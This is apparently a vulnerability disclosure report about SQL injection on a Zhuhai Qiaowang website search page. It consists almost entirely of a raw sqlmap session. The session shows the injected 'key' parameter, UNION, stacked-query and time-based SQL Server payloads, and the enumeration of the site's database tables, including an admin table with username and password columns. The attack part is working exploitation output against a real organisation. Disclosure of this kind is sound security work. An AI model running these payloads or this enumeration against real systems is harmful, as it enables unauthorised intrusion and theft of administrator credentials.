珠海侨网某处存在sql注入

**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27 [email protected]:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" -t T_Admin --columns _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20160413} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| https://**.**.**.** [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 22:22:39 T_Admin [22:22:39] [INFO] setting file for logging HTTP traffic [22:22:39] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly are you really sure that you want to continue (sqlmap could have problems)? [y/N] y [22:22:41] [INFO] resuming back-end DBMS 'microsoft sql server' [22:22:41] [INFO] testing connection to the target URL [22:22:41] [WARNING] reflective value(s) found and filtering out sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: key (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'-- --- [22:22:41] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2005 [22:22:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns [22:22:41] [INFO] fetching current database [22:22:41] [INFO] fetching tables for database: zhqw [22:22:41] [INFO] the SQL query used returns 32 entries [22:22:41] [INFO] fetching columns for table 'Choice' in database 'zhqw' [22:22:41] [INFO] the SQL query used returns 5 entries [22:22:41] [INFO] resumed: "choice","nvarchar" [22:22:41] [INFO] resumed: "extends","int" [22:22:41] [INFO] resumed: "id","int" [22:22:41] [INFO] resumed: "IsDefault","int" [22:22:41] [INFO] resumed: "num","int" [22:22:41] [INFO] fetching columns for table 'Reply' in database 'zhqw' [22:22:42] [INFO] the SQL query used returns 4 entries [22:22:42] [INFO] retrieved: "contant","nvarchar" [22:22:42] [INFO] retrieved: "id","int" [22:22:43] [INFO] retrieved: "replytime","datetime" [22:22:43] [INFO] retrieved: "tid","int" [22:22:43] [INFO] fetching columns for table 'T_Admin' in database 'zhqw' [22:22:44] [INFO] the SQL query used returns 11 entries [22:22:45] [INFO] retrieved: "addtime","datetime" [22:22:45] [INFO] retrieved: "AdminWrite","ntext" [22:22:45] [INFO] retrieved: "bumenid","int" [22:22:46] [INFO] retrieved: "czname","nvarchar" [22:22:46] [INFO] retrieved: "jueseid","nvarchar" [22:22:46] [INFO] retrieved: "phone","nvarchar" [22:22:47] [INFO] retrieved: "roleid","int" [22:22:47] [INFO] retrieved: "uid","int" [22:22:47] [INFO] retrieved: "userid","nvarchar" [22:22:48] [INFO] retrieved: "username","nvarchar" [22:22:48] [INFO] retrieved: "userpwd","nvarchar" [22:22:48] [INFO] fetching columns for table 'Title' in database 'zhqw' [22:22:49] [INFO] the SQL query used returns 6 entries [22:22:49] [INFO] retrieved: "choice","smallint" [22:22:49] [INFO] retrieved: "current","bit" [22:22:50] [INFO] retrieved: "id","int" [22:22:50] [INFO] retrieved: "title","nvarchar" [22:22:50] [INFO] retrieved: "typeid","int" [22:22:51] [INFO] retrieved: "windows","bit" [22:22:51] [INFO] fetching columns for table 'aboutInfo' in database 'zhqw' [22:22:51] [INFO] the SQL query used returns 4 entries [22:22:52] [INFO] retrieved: "aid","int" [22:22:52] [INFO] retrieved: "neirong","nvarchar" [22:22:52] [INFO] retrieved: "stypeid","int" [22:22:53] [INFO] retrieved: "typeid","int" [22:22:53] [INFO] fetching columns for table 'adInfo' in database 'zhqw' [22:22:53] [INFO] the SQL query used returns 6 entries [22:22:53] [INFO] retrieved: "aid","int" [22:22:54] [INFO] retrieved: "ispass","int" [22:22:54] [INFO] retrieved: "link","nvarchar" [22:22:55] [INFO] retrieved: "name","nvarchar" [22:22:55] [INFO] retrieved: "pic","nvarchar" [22:22:55] [INFO] retrieved: "typeid","int" [22:22:56] [INFO] fetching columns for table 'bumenInfo' in database 'zhqw' [22:22:56] [INFO] the SQL query used returns 3 entries [22:22:56] [INFO] retrieved: "beizhu","nvarchar" [22:22:57] [INFO] retrieved: "bid","int" [22:22:57] [INFO] retrieved: "name","nvarchar" [22:22:57] [INFO] fetching columns for table 'classType' in database 'zhqw' [22:22:57] [INFO] the SQL query used returns 6 entries [22:22:58] [INFO] retrieved: "cid","int" [22:22:58] [INFO] retrieved: "classname","nvarchar" [22:22:58] [INFO] retrieved: "htlink","nvarchar" [22:22:59] [INFO] retrieved: "lowerid","int" [22:22:59] [INFO] retrieved: "pxid","int" [22:23:00] [INFO] retrieved: "qtlink","nvarchar" [22:23:00] [INFO] fetching columns for table 'config' in database 'zhqw' [22:23:00] [INFO] the SQL query used returns 12 entries [22:23:00] [INFO] retrieved: "ckid","int" [22:23:01] [INFO] retrieved: "count","int" [22:23:01] [INFO] retrieved: "webAddress","nvarchar" [22:23:01] [INFO] retrieved: "webemail","nvarchar" [22:23:02] [INFO] retrieved: "webFax","nvarchar" [22:23:02] [INFO] retrieved: "webhomepage","nvarchar" [22:23:02] [INFO] retrieved: "webKeycontent","nvarchar" [22:23:03] [INFO] retrieved: "webKeycontent","nvarchar" [22:23:03] [INFO] retrieved: "webname","nvarchar" [22:23:03] [INFO] retrieved: "webTel","nvarchar" [22:23:04] [INFO] retrieved: "webyoubian","nvarchar" [22:23:04] [INFO] retrieved: "wid","int" [22:23:04] [INFO] fetching columns for table 'dingyueInfo' in database 'zhqw' [22:23:04] [INFO] the SQL query used returns 8 entries [22:23:05] [INFO] retrieved: "addtime","datetime" [22:23:05] [INFO] retrieved: "did","int" [22:23:06] [INFO] retrieved: "laiyuan","nvarchar" [22:23:06] [INFO] retrieved: "neirong","nvarchar" [22:23:06] [INFO] retrieved: "pic","nvarchar" [22:23:07] [INFO] retrieved: "title","nvarchar" [22:23:07] [INFO] retrieved: "typeid","int" [22:23:08] [INFO] retrieved: "userid","nvarchar" [22:23:08] [INFO] fetched tables' columns on database 'zhqw' Database: zhqw Table: config [11 columns] +---------------+----------+ | Column | Type | +---------------+----------+ | ckid | int | | count | int | | webAddress | nvarchar | | webemail | nvarchar | | webFax | nvarchar | | webhomepage | nvarchar | | webKeycontent | nvarchar | | webname | nvarchar | | webTel | nvarchar | | webyoubian | nvarchar | | wid | int | +---------------+----------+ Database: zhqw Table: bumenInfo [3 columns] +--------+----------+ | Column | Type | +--------+----------+ | beizhu | nvarchar | | bid | int | | name | nvarchar | +--------+----------+ Database: zhqw Table: T_Admin [11 columns] +------------+----------+ | Column | Type | +------------+----------+ | addtime | datetime | | AdminWrite | ntext | | bumenid | int | | czname | nvarchar | | jueseid | nvarchar | | phone | nvarchar | | roleid | int | | uid | int | | userid | nvarchar | | username | nvarchar | | userpwd | nvarchar | +------------+----------+ Database: zhqw Table: dingyueInfo [8 columns] +---------+----------+ | Column | Type | +---------+----------+ | addtime | datetime | | did | int | | laiyuan | nvarchar | | neirong | nvarchar | | pic | nvarchar | | title | nvarchar | | typeid | int | | userid | nvarchar | +---------+----------+ Database: zhqw Table: adInfo [6 columns] +--------+----------+ | Column | Type | +--------+----------+ | aid | int | | ispass | int | | link | nvarchar | | name | nvarchar | | pic | nvarchar | | typeid | int | +--------+----------+ Database: zhqw Table: aboutInfo [4 columns] +---------+----------+ | Column | Type | +---------+----------+ | aid | int | | neirong | nvarchar | | stypeid | int | | typeid | int | +---------+----------+ Database: zhqw Table: classType [6 columns] +-----------+----------+ | Column | Type | +-----------+----------+ | cid | int | | classname | nvarchar | | htlink | nvarchar | | lowerid | int | | pxid | int | | qtlink | nvarchar | +-----------+----------+ Database: zhqw Table: Title [6 columns] +---------+----------+ | Column | Type | +---------+----------+ | choice | smallint | | current | bit | | id | int | | title | nvarchar | | typeid | int | | windows | bit | +---------+----------+ Database: zhqw Table: Choice [5 columns] +-----------+----------+ | Column | Type | +-----------+----------+ | choice | nvarchar | | extends | int | | id | int | | IsDefault | int | | num | int | +-----------+----------+ Database: zhqw Table: Reply [4 columns] +-----------+----------+ | Column | Type | +-----------+----------+ | contant | nvarchar | | id | int | | replytime | datetime | | tid | int | +-----------+----------+ [22:23:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**' [*] shutting down at 22:23:08